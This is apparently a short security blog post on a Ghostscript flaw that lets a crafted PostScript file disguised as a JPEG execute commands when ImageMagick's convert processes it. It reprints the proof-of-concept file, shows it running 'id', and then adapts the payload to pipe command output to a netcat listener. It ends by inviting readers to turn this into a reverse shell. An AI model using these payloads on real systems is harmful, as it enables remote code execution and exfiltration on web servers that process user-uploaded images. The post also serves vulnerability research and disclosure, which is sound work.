ImageMagic RCE

Overnight @taviso dropped a few vulnerabilities in GhostScript, including one that will cause code execution in ImageMagick.

Link to the bug report in Project Zero.

ImageMagick is not shy when it comes to the amount of vulnerabilities disclosed, with over 40 in 2018, and who can forget the marketing around ‘ImageTragick’?

The ImageMagick code execution caught my eye, mostly because it is widely used on web servers, it seemed fairly trivial to exploit, and seemed to show the most promise in turning to a remote code execution.

The PoC provided by Tavis is fairly easy to break down, with the part highlighted responsible for executing the code (Ubuntu Poc):

$ cat shellexec.jpeg
%!PS
userdict /setpagedevice undef
save
legal
{ null restore } stopped { pop } if
{ legal } stopped { pop } if
restore
mark /OutputFile (%pipe%id) currentdevice putdeviceprops

Running convert on the above file will execute the ‘id’ command, returning the id of the user that ran convert.

convert shellexec.jpg blah.gif
uid=1000(user) gid=1000(user) groups=1000(user),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),118(lpadmin),128(sambashare)

Quick and nasty testing showed that this could indeed be used to force a system to connect to another machine:

mark /OutputFile (%pipe%echo `id` | nc 127.0.0.1 1337) currentdevice putdeviceprops

becomes:

$ nc -lvvp 1337                 
Listening on [0.0.0.0] (family 0, port 1337)
Connection from localhost 55068 received!
uid=1000(user) gid=1000(user) groups=1000(user),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),118(lpadmin),128(sambashare)

Success! Command execution through to a ‘remote’ system. Modify payloads accordingly and you’ll have a ‘proper’ reverse shell ;)

Happy hacking.